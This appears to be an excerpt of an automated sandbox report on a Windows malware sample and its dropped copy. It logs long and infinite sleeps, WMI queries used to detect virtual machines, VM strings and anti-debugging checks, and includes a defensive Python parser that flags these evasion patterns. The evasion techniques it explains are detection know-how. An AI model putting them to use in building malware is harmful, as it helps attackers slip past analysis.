                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 599475
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 599326
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 599167
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 598999
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 598887
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 598780
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 598670
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 596140
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 596031
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 595922
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 595812
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 595703
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 595593
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 595484
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 595375
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 595266
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 595048
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 594930
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 594828
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 594718
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 594609
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 594500
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 594382
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 594281
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 594172
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 594062
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 593953
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 593844
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 593719
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Thread delayed: delay time: 593609
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 599891
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 599781
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 599672
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 599563
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 599438
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 599110
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 598737
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 596597
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 596266
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 596141
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 596031
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 595922
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 595813
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 595688
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 595563
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 595453
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 595344
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 595219
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 595109
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 595000
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 594891
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 594781
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 594672
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 594563
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 594438
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 594327
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 594219
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 594094
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 593985
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Thread delayed: delay time: 593860
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6036
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5609
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Window / User API: threadDelayed 3848
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe Window / User API: threadDelayed 5849
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Window / User API: threadDelayed 1408
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe Window / User API: threadDelayed 8440
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 6740 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5708 Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2612 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2356 Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5196 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep count: 34 > 30
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -31359464925306218s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 4136 Thread sleep count: 3848 > 30
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -599856s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -599726s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -599624s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -599475s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -599326s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -599167s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -598999s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -598887s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -598780s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -598670s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 4136 Thread sleep count: 5849 > 30
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -99859s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -99750s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -99640s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -99531s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -99422s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -99312s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -99203s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -99094s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -98953s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -98844s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -98734s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -98623s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -98515s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -98405s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -98297s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -98187s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -98078s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -97969s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -97844s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -97732s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -97625s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -596140s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -596031s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -595922s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -595812s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -595703s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -595593s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -595484s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -595375s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -595266s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -595048s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -594930s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -594828s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -594718s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -594609s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -594500s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -594382s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -594281s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -594172s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -594062s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -593953s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -593844s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -593719s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800 Thread sleep time: -593609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 2268 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -26747778906878833s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 6820Thread sleep count: 1408 > 30
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 6820Thread sleep count: 8440 > 30
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599563s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -598737s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99545s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -98890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -98781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -98672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -98561s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668 | Thread sleep time (each >= -30000s): -98453s, -98343s, -98233s, -98125s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668 | Thread sleep time (each >= -30000s): -596597s, -596266s, -596141s, -596031s, -595922s, -595813s, -595688s, -595563s, -595453s, -595344s, -595219s, -595109s, -595000s, -594891s, -594781s, -594672s, -594563s, -594438s, -594327s, -594219s, -594094s, -593985s, -593860s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 occurrences)
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 occurrences)
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Thread delayed: delay times: 600000, 599856, 599726, 599624, 599475, 599326, 599167, 598999, 598887, 598780, 598670
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Thread delayed: delay times: 100000, 99859, 99750, 99640, 99531, 99422, 99312, 99203, 99094, 98953, 98844, 98734, 98623, 98515, 98405, 98297, 98187, 98078, 97969, 97844, 97732, 97625
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Thread delayed: delay times: 596140, 596031, 595922, 595812, 595703, 595593, 595484, 595375, 595266, 595048, 594930, 594828, 594718, 594609, 594500, 594382, 594281, 594172, 594062, 593953, 593844, 593719, 593609
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Thread delayed: delay times: 600000, 599891, 599781, 599672, 599563, 599438, 599328, 599218, 599110, 598737
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Thread delayed: delay times: 100000, 99875, 99765, 99656, 99545, 99437, 99328, 99218, 99109, 99000, 98890, 98781, 98672, 98561, 98453, 98343, 98233, 98125
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Thread delayed: delay times: 596597, 596266, 596141, 596031, 595922, 595813, 595688, 595563, 595453, 595344, 595219, 595109, 595000, 594891, 594781, 594672, 594563, 594438, 594327, 594219, 594094, 593985, 593860
                    Source: XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
                    Source: XNYbGrcoFr.exe, 0000000B.00000002.2170152111.00000000084E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: XNYbGrcoFr.exe, 0000000E.00000002.4534286428.0000000000436000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: vmware
                    Source: XNYbGrcoFr.exe, 0000000E.00000002.4534286428.0000000000436000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: XNYbGrcoFr.exe, 0000000E.00000002.4535915525.00000000012EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                    Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4535435384.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process information queried: ProcessInformation
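The delay and WMI lines above are what a sandbox-evasion verdict rests on, and the numbers say more than the individual entries show: 922337203685477 ms is .NET TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks divided by 10000), a wait that never returns on its own, and the descending runs (600000, 599856, 599726 ... and 100000, 99859, ...) are a loop that re-sleeps for the time still left until a fixed deadline, which defeats sandboxes that only shorten each individual Sleep call. The Python below is an added example, not part of this report and not code from the sample: it parses constructed lines in a "Source: <process> | <behaviour>" style modelled on the report, collapses each descending run to the wait it actually intends, counts the infinite waits, and lists the WMI classes queried for VM fingerprinting. The sample lines, the 1000 ms step threshold and all function names are assumptions made for the example.

```python
import re
from collections import defaultdict

# .NET TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10000): a wait of
# this length never returns on its own, so the thread idles until the process dies.
TIMESPAN_MAX_MS = 922_337_203_685_477

# WMI classes whose properties are the usual VM fingerprint sources; the report's
# queries hit the first three, the other two are the common companions.
VM_FINGERPRINT_CLASSES = {
    "Win32_ComputerSystem": "Manufacturer, Model",
    "Win32_BaseBoard": "Manufacturer, Product",
    "Win32_Processor": "Name, NumberOfCores",
    "Win32_VideoController": "Name, AdapterCompatibility",
    "Win32_NetworkAdapter": "MACAddress (vendor OUI)",
}

# Constructed sample input (an assumption for this example, not copied from the
# report) in a "Source: <process> | <behaviour>" line style; values mirror its runs.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Thread delayed: delay time: 599856
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Thread delayed: delay time: 599726
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Thread delayed: delay time: 599624
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Thread delayed: delay time: 99859
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Thread delayed: delay time: 99750
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
"""

DELAY_RE = re.compile(r"Source: (\S+).*?Thread delayed: delay time: (\d+)")
WMI_RE = re.compile(r"Source: (\S+).*?WMI Queries:.*?(Win32_\w+)")


def parse_delays(report_text):
    """Per-process list of requested delays (ms), in report order."""
    delays = defaultdict(list)
    for line in report_text.splitlines():
        m = DELAY_RE.search(line)
        if m:
            delays[m.group(1)].append(int(m.group(2)))
    return delays


def wmi_fingerprint_classes(report_text):
    """Per-process set of fingerprint-relevant WMI classes that were queried."""
    classes = defaultdict(set)
    for line in report_text.splitlines():
        m = WMI_RE.search(line)
        if m and m.group(2) in VM_FINGERPRINT_CLASSES:
            classes[m.group(1)].add(m.group(2))
    return classes


def deadline_loops(values, max_step_ms=1000, min_len=3):
    """Runs where each delay is slightly shorter than the previous one: a loop that
    re-requests the time left until a fixed deadline, so shortening individual
    Sleep calls does not bring the payload forward. Returns (first_value, length)."""
    loops, start = [], 0
    for i in range(1, len(values) + 1):
        contiguous = i < len(values) and 0 < values[i - 1] - values[i] <= max_step_ms
        if not contiguous:
            if i - start >= min_len:
                loops.append((values[start], i - start))
            start = i
    return loops


def effective_wait_ms(values, max_step_ms=1000):
    """Wait the sample intends before acting: each descending run counts once (its
    first value) and infinite waits are left out because they never complete."""
    total, prev = 0, None
    for v in values:
        if v >= TIMESPAN_MAX_MS:
            continue
        if prev is None or not (0 < prev - v <= max_step_ms):
            total += v  # start of a new run, or an isolated sleep
        prev = v
    return total


def triage(report_text):
    """Summarise the evasion-relevant timing and WMI behaviour per process."""
    delays = parse_delays(report_text)
    wmi = wmi_fingerprint_classes(report_text)
    findings = {}
    for src in sorted(set(delays) | set(wmi)):
        vals = delays.get(src, [])
        findings[src] = {
            "infinite_waits": sum(1 for v in vals if v >= TIMESPAN_MAX_MS),
            "deadline_loops": deadline_loops(vals),
            "effective_wait_ms": effective_wait_ms(vals),
            "vm_wmi_classes": sorted(wmi.get(src, ())),
        }
    return findings


if __name__ == "__main__":
    for src, f in triage(SAMPLE_LINES).items():
        print(src, f)
```

On the constructed input the sample process comes out with one infinite wait, two deadline loops starting at 600000 ms and 100000 ms (an intended wait of 700000 ms, not the 2.4 million ms a naive sum of the lines would give), and WMI queries against Win32_BaseBoard and Win32_ComputerSystem; the powershell.exe entry shows only the infinite wait, which is the host process blocking on its pipeline rather than evasion.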

                    Anti Debugging

                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_02947EC0 CheckRemoteDebuggerPresent, 9_2_02947EC0
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Process queried: DebugPort
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 occurrences)
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

